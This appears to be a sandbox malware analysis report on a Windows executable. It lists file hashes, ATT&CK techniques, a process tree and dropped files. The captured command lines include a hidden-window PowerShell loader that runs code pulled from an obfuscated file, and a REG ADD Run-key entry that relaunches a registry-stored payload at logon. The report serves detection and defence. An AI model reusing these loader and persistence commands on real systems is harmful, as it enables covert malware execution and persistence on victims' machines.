61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d

General

Target

61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe
Size

806KB
MD5

9cef532829a4ca2cf13279ac134873d8
SHA1

68f4c94bf29fb0cbde97973083f85bf08382f2a2
SHA256

61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d
SHA512

f938aa8fddeac26fc862c1bd312ac2ef57843e7922b4e14b4b69b8db9888bf250f5572df79fe13710df89293c116da144d7da90d0783b8e85e56d0791607d1b5
SSDEEP

12288:QQT9bUbPgROCAVtagRJGYkCLVaZxnHo6o0L9eC/CgDCJc2Lg:jTZOPgROAitkCQjH1e2n2Lg

Score

8^/10

discovery execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
592	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\Miljfarlig = "%skaberevnes% -windowstyle minimized $Irreconcilable=(Get-ItemProperty -Path 'HKCU:\\Untranquilly\\').Vnnedes;%skaberevnes% ($Irreconcilable)"	reg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
592	powershell.exe
2428	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 592 set thread context of 2428	592	powershell.exe	33

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\monopolies\Semiconformist209.ini	61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1900	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
592	powershell.exe
592	powershell.exe
592	powershell.exe
592	powershell.exe
592	powershell.exe
592	powershell.exe
592	powershell.exe
592	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
592	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	592	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2020 wrote to memory of 592	2020	61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe	29
PID 2020 wrote to memory of 592	2020	61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe	29
PID 2020 wrote to memory of 592	2020	61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe	29
PID 2020 wrote to memory of 592	2020	61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe	29
PID 592 wrote to memory of 2428	592	powershell.exe	33
PID 592 wrote to memory of 2428	592	powershell.exe	33
PID 592 wrote to memory of 2428	592	powershell.exe	33
PID 592 wrote to memory of 2428	592	powershell.exe	33
PID 592 wrote to memory of 2428	592	powershell.exe	33
PID 592 wrote to memory of 2428	592	powershell.exe	33
PID 2428 wrote to memory of 2176	2428	wab.exe	34
PID 2428 wrote to memory of 2176	2428	wab.exe	34
PID 2428 wrote to memory of 2176	2428	wab.exe	34
PID 2428 wrote to memory of 2176	2428	wab.exe	34
PID 2176 wrote to memory of 1900	2176	cmd.exe	36
PID 2176 wrote to memory of 1900	2176	cmd.exe	36
PID 2176 wrote to memory of 1900	2176	cmd.exe	36
PID 2176 wrote to memory of 1900	2176	cmd.exe	36

C:\Users\Admin\AppData\Local\Temp\61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe
"C:\Users\Admin\AppData\Local\Temp\61dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Apologetics=Get-Content 'C:\Users\Admin\AppData\Local\Temp\ew\Tubolabellate255\drmmesynerne\Planular\Fikserbilleders.Suv';$Nybyggerens=$Apologetics.SubString(4057,3);.$Nybyggerens($Apologetics)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:592
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Miljfarlig" /t REG_EXPAND_SZ /d "%skaberevnes% -windowstyle minimized $Irreconcilable=(Get-ItemProperty -Path 'HKCU:\Untranquilly\').Vnnedes;%skaberevnes% ($Irreconcilable)"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2176
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Miljfarlig" /t REG_EXPAND_SZ /d "%skaberevnes% -windowstyle minimized $Irreconcilable=(Get-ItemProperty -Path 'HKCU:\Untranquilly\').Vnnedes;%skaberevnes% ($Irreconcilable)"
        5⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ew\Tubolabellate255\drmmesynerne\Planular\Climbingfishes204.ove

Filesize
381KB

MD5
ffd943a215875808b58bfe8fb66dc36e

SHA1
2e3ccabd084b3335437166efac9b5f4e61a0ea5e

SHA256
25e152e218163dbbb491f525eba3cd343ef10ef77dbf91f963e55a00f5256319

SHA512
d6da2c9ef8b257d40f03c5c7364c6be64cfe3a7b53547a0764543341e6cd3e3995434f7148ac42522587f38a3793b0c600458ecddfa794db387733c1b0505212

Download Submit
C:\Users\Admin\AppData\Local\Temp\ew\Tubolabellate255\drmmesynerne\Planular\Fikserbilleders.Suv

Filesize
52KB

MD5
c7e476eea30eca1676cb4a0f119ac5b6

SHA1
d14ed291418432fd94da286500d1a4e462dc76aa

SHA256
07b291f2c6b0c714dc3a608aeec0637845dd0c373c015e6d8d548dfa48aa7d9e

SHA512
302eb4088b11bd4238071306200e52422da059ed4286890a84c6ca5acb40a30e96e33a898c7b23123f2e5fe1abaf677fe77266468be8dfed6523b18bd169f741

Download Submit
memory/592-7-0x0000000073DB1000-0x0000000073DB2000-memory.dmp

Filesize
4KB

Download
memory/592-8-0x0000000073DB0000-0x000000007435B000-memory.dmp

Filesize
5.7MB

Download
memory/592-9-0x0000000073DB0000-0x000000007435B000-memory.dmp

Filesize
5.7MB

Download
memory/592-10-0x0000000073DB0000-0x000000007435B000-memory.dmp

Filesize
5.7MB

Download
memory/592-11-0x0000000073DB0000-0x000000007435B000-memory.dmp

Filesize
5.7MB

Download
memory/592-14-0x0000000073DB0000-0x000000007435B000-memory.dmp

Filesize
5.7MB

Download
memory/592-16-0x0000000073DB0000-0x000000007435B000-memory.dmp

Filesize
5.7MB

Download
memory/592-17-0x0000000006750000-0x000000000B635000-memory.dmp

Filesize
78.9MB

Download
memory/592-18-0x0000000073DB0000-0x000000007435B000-memory.dmp

Filesize
5.7MB

Download
memory/2428-19-0x0000000000490000-0x00000000014F2000-memory.dmp

Filesize
16.4MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads